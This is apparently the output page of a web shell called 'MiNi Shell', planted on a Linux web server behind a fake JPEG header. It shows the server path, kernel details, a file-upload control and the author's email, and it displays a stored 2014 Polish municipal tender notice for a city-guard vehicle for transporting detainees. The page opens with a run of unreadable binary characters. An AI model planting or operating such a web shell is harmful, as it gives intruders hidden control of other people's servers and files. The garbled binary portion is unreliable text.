JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140310/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140310/78948-N-2014.html

<p class="kh_header"><b>Suwałki: Dostawa samochodu osobowego przystosowanego do przewozu osób zatrzymanych dla potrzeb Straży Miejskiej w Suwałkach z wliczeniem w cenę rozliczenia barterowego za używany samochód osobowy przekazany dostawcy przez Zamawiającego</b><br>
<b>Numer ogłoszenia: 78948 - 2014; data zamieszczenia: 10.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Suwałki , ul. Mickiewicza 1, 16-400 Suwałki, woj. podlaskie, tel. 087 5628000, faks 087 5628098.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.suwalki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa samochodu osobowego przystosowanego do przewozu osób zatrzymanych dla potrzeb Straży Miejskiej w Suwałkach z wliczeniem w cenę rozliczenia barterowego za używany samochód osobowy przekazany dostawcy przez Zamawiającego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa samochodu osobowego przystosowanego do przewozu osób zatrzymanych dla potrzeb Straży Miejskiej w Suwałkach z wliczeniem w cenę rozliczenia barterowego za używany samochód osobowy przekazany dostawcy przez Zamawiającego.
2. Samochód musi spełniać następujące wymagania, przy czym Zamawiający dopuszcza możliwość złożenia oferty z wyposażeniem wyższym niż poniżej opisane wyposażenie wymagane:
Minimalne wymagane warunki  techniczne
1. Rok produkcji 2013/ 2014 fabrycznie nowy o parametrach nie gorszych niż:
2. Ilość miejsc - przedział osobowy pozwalający na przewóz 5 osób, przedział dla osób zatrzymanych 2 osoby
3.	Skrzynia biegów mechaniczna 5 biegowa
4.	Silnik benzynowy o minimalnej pojemności 1,4 litra
5.	Moc silnika minimum 95 KM
6.	Kolor nadwozia srebrny - zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 31.12. 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia ( Dz. U z 2013 r. poz. 951)
Wyposażenie pojazdu:
1.	Klimatyzacja minimum ręczna
2.	Immobiliser w kluczyku 
3.	Alarm
4.	Centralny zamek ze zdalnym otwieraniem
5.	Czujnik cofania 
6.	Elektryczne sterowanie szyb z przodu
7.	Tylne szyby przyciemniane
8.	Trójkąt odblaskowy
9.	Apteczka
10.	Wycieraczki gumowe głębokie komplet przód i tył
11.	Lokalizator GPS -Sterownik ET-GPS-GSM SMOK N produkcji firmy ELTE GPS Sp. z o.o. lub równoważny
12.	Poduszka powietrzna kierowcy i pasażera
13.	Pełnowymiarowe koło zapasowe
14.	Wspomaganie układu kierowniczego
15.	Regulowana kolumna kierownicy  w dwóch płaszczyznach
16.	ABS+ system wspomagania awaryjnego
17.	Światła do jazdy dziennej
18.	Drzwi przednie od strony kierowcy i pasażera uchylne
19.	Drzwi boczne (2 szt.) przesuwane 
20.	Drzwi tyle dwuskrzydłowe (przedziału  do przewożenia zatrzymanych)  otwierane na boki
21.	Komplet kół letnich i zimowych - z felgami
22.	W części osobowej układ siedzeń 2 + 3,  siedzenia dla strażników  wykonane, jako pojedyncze lub zespolone fotele z zagłówkami i trzypunktowymi pasami bezpieczeństwa
Przedział do przewozu osób zatrzymanych - dwuosobowy
23.	Fotele 2 szt. ze składanym siedzeniem wykonane z materiału odpornego na uszkodzenia mechaniczne (np. sklejka laminowana), montowane tyłem do kierunku jazdy, wykonane z materiałów spełniających polskie normy, oraz wymogi bezpieczeństwa, dotyczące warunków przewożenia osób zatrzymanych. Przedział dla zatrzymanych wzmocniony i wykonany z materiałów odpornych na uszkodzenia mechaniczne, oddzielony od przedziału części osobowej płytami grodziowymi, montowanymi od podłogi do dachu, wypełnienie w górnej części przegrody przezroczystym poliwęglanem z otworami wentylacyjnymi zapewniającymi komunikację między kierującym pojazdem a zatrzymanym. Wszystkie ewentualne przeszklenia oraz elementy wykonane z materiałów przezroczystych w ww. przedziale muszą być zabezpieczone kratami/siatką metalową, podłoga z blachy aluminiowej, ryflowanej z otworami w podłodze, w odpływami na zewnątrz pojazdu umożliwiającymi swobodny odpływ wody, natomiast wykończenie (klatki) musi być szczelne, uniemożliwiające przedostawanie się wody do kabiny pojazdu - części pasażerskiej, zdemontowane wszelkie zbędne elementy, dodatkowo oświetlenie ledowe białe, zabezpieczone przed dewastacją i sterowane z pozycji kierowcy, dwukierunkowy wentylator (nawiew/wyciąg) w przedziale uruchamiany z kabiny pojazdu, ogrzewanie przedziału sterowane z pozycji kierowcy, ilość jednocześnie przewożonych osób max.- 2, minimum biodrowe pasy bezpieczeństwa (dopuszcza się bezwładnościowe pasy bezpieczeństwa 3- punktowe) dla 2 osób. Przy siedzeniach uchwyty do zapinania środków przymusu bezpośredniego, kajdanek, zamocowane w sposób niezagrażający osobom przewożonym. Zabezpieczenie szyb od wewnątrz poprzez okratowanie. Zabezpieczenie drzwi tylnych - krata dwuskrzydłowa z zamkiem, bez możliwości otwierania drzwi od wewnątrz. 
Zmiany adaptacyjne przedziału dla zatrzymanych muszą  pozwalać  na dopuszczenie pojazdu do rejestracji na terenie Polski na podstawie przepisów zawartych w  ustawie 
z dnia 20.06. 1997 r. Prawo o ruchu drogowym (Dz. U z 2012 r. poz. 1137 z późn. zm.).
24.	Gaśnica 
Wymagania dotyczące instalacji łączności radiowej
25.	Umiejscowienie i umocowanie anteny do radiostacji  samochodowej  ? lambda pasmo VHF 136-174 MHz w sposób umożliwiający mycie pojazdu w myjni automatycznej.
Sygnalizacja  uprzywilejowania pojazdu w ruchu drogowym.
26.	Na dachu pojazdu  instalacja sygnalizacyjno-ostrzegawcza świetlna (błyskowa) - światło w kolorze niebieskim, belka z napisem Straż Miejska, z możliwością podawania komunikatów  głosowych  z manipulatorem  sterowanie i mikrofon, o niskim poborze prądu - zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 31.12.2002 r. w sprawie warunków  technicznych  pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. z 2013 r. poz. 951) zamontowana na relingach  dachowych wzdłużnych lub na belce poprzecznej
Oznakowanie pojazdu
27.	Oznakowanie samochodu zgodnie z rozporządzeniem Ministra Infrastruktury dnia 31.12. 2002 r. w sprawie warunków  technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. z 2013 r. poz. 951). Rozmieszczenie oklejenia  do uzgodnienia po wyborze oferty.

3.	Pojazd musi spełniać: wymogi techniczne określone w rozporządzeniu Ministra Infrastruktury z dnia 31.12. 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U z 2013 r. poz. 951).
4.	Wszystkie podzespoły elektroniczne montowane dodatkowo muszą posiadać świadectwo homologacji. 
5.	Urządzenia świetlne sygnalizacji - specjalna lampa zespolona musi posiadać świadectwo homologacji.
6.	Pojazd musi być fabrycznie nowy, bez wad ukrytych, na bazie którego wykonana zostanie adaptacja, pozwalająca na dopuszczenie tak zmodyfikowanego pojazdu do rejestracji na terenie Polski, na podstawie przepisów zawartych w ustawie z dnia  20.06.1997 r. Prawo o ruchu drogowym-  (Dz. U. z 2012 r. poz.1137 z późn. zm.). Zmiany adaptacyjne  (przystosowanie pojazdu  nie mogą powodować  utraty świadectwa zgodności (homologacji), ani ograniczenia uprawnień wynikających z fabrycznej gwarancji  samochodu  bazowego
7.	Pojazd musi spełniać: normę Euro 5 określoną rozporządzeniem (WE) nr 715/2007 Parlamentu Europejskiego i Rady z 20.06.2007 r. w sprawie homologacji typu pojazdów silnikowych w odniesieniu do emisji zanieczyszczeń pochodzących z lekkich pojazdów pasażerskich i użytkowych (Euro 5 i Euro 6) oraz w sprawie dostępu do informacji dotyczących naprawy i utrzymania pojazdów.  
8.	Samochód musi posiadać homologację wystawioną zgodnie z ustawą z dnia 20.06.1997 r. Prawo o ruchu drogowym ( Dz. U. z 2012 r. poz. 1137 z późn. zm.).
9.	Samochód musi spełniać warunki techniczne przewidziane przez obowiązujące w Polsce przepisy prawne dla samochodów osobowych poruszających się po drogach publicznych oraz warunki przewidziane przez przepisy prawa wspólnotowego w Unii Europejskiej dla tego typu samochodów.  Wykonawca zobowiązuje się dostarczyć przedmiot zamówienia zgodnie ze wszystkimi wymaganiami Zamawiającego wskazanymi w  siwz.
10.	Samochód osobowy używany, oferowany do rozliczenia barterowego - (własność Zamawiającego) ma następujące parametry:
1) samochód osobowy marki Peugeot Partner  przystosowany do przewozu osób zatrzymanych, rok produkcji 2008, silnik wysokoprężny - 1568cm3 
2)   przebieg   239 377  km, 
3) skrzynia biegów manualna 5-biegowa, lakier koloru niebieskiego, wyposażony
w autoalarm, komplet opon letnich,
4)   garażowany, serwisowany i naprawiany w autoryzowanym serwisie, 
5)   Zamawiający jest pierwszym właścicielem  samochodu ma książkę pojazdu.

Zamawiający załącza zdjęcia pojazdu.
Przed dokonaniem wyceny do celów uwzględnienia w swojej ofercie Wykonawca można dokonać oględzin pojazdu, celem zapoznania ze stanem technicznym. Oględziny możliwe będą po telefonicznym uzgodnieniu (tel.: 087 563 56 08) terminu i godziny w siedzibie Straży Miejskiej w Suwałkach przy ul. Noniewicza 71 A.

14.	Wykonawca wyposaży Zamawiającego w dokumentację techniczno-eksploatacyjną: instrukcję obsługi samochodu w języku polskim, kartę gwarancyjną, świadectwo homologacji oraz we wszystkie dokumenty niezbędne do rejestracji w Wydziale Komunikacji ponadto w wykaz autoryzowanych stacji obsługi.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.11.40.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca zapewni jako część swojej oferty wadium w wysokości: 1.000,00 (słownie: jeden tysiąc złotych) na całość zamówienia.
2.	Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. z 2007 r Nr 42 poz.275).
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Urzędu Miejskiego w Suwałkach w Banku Pekao S.A. II/O w Suwałkach nr 76 1240 5211 1111 0000 4929 8215  w terminie do dnia  24.03.2014 r. do godz. 10:00 (decyduje data wpływu środków na rachunek zamawiającego). Kserokopię dowodu wniesienia wadium należy złożyć w ofercie. 
Wadium w pozostałych formach - oryginały - składa się w Urzędzie Miejskim w Wydziale Finansowym, w pokoju nr 148, ul. Mickiewicza 1, 16-400 Suwałki przed upływem terminu składania ofert.
3. Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
4. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
5. Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert,
6. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
7. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
8. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących  po jego stronie</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeśli Wykonawca przedłoży w ofercie oświadczenie w trybie art.22 ust.1 ustawy Prawo zamówień publicznych. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach o których mowa w rozdziale 10 i 11 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeśli Wykonawca przedłoży w ofercie oświadczenie w trybie art.22 ust.1 ustawy Prawo zamówień publicznych. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach o których mowa w rozdziale 10 i 11 SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeśli Wykonawca przedłoży w ofercie oświadczenie w trybie art.22 ust.1 ustawy Prawo zamówień publicznych. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach o których mowa w rozdziale 10 i 11 SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeśli Wykonawca przedłoży w ofercie oświadczenie w trybie art.22 ust.1 ustawy Prawo zamówień publicznych. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach o których mowa w rozdziale 10 i 11 SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeśli Wykonawca przedłoży w ofercie oświadczenie w trybie art.22 ust.1 ustawy Prawo zamówień publicznych. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach o których mowa w rozdziale 10 i 11 SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Wielkość zużytej energii - 6</li>
<li>3 - Wielkość emisji dwutlenku węgla - 2</li>
<li>4 - Wielkość emisji wielkość emisji zanieczyszczeń - tlenków azotu, części stałych oraz węglowodorów - 2</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące rodzaje i warunki zmiany treści umowy: 1) polepszenia parametrów technicznych dostawy; 2) aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących przepisów, 3) zmiana terminu wykonania wskutek okoliczności niezależnych, niemożliwych do przewidzenia w momencie podpisywania umowy lub działania siły wyższej. Powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia zgody</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.suwalki.pl/Przetargi_sekcja/zamo_publ_w_2014_lista.htm<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, Wydział Zamówień Publicznych ul. Mickiewicza 1 16-400 Suwałki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.03.2014 godzina 10:00, miejsce: Urząd Miejski Kancelaria Ogólna pokój nr 6 ul. Mickiewicza 1, 16-400 Suwałki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com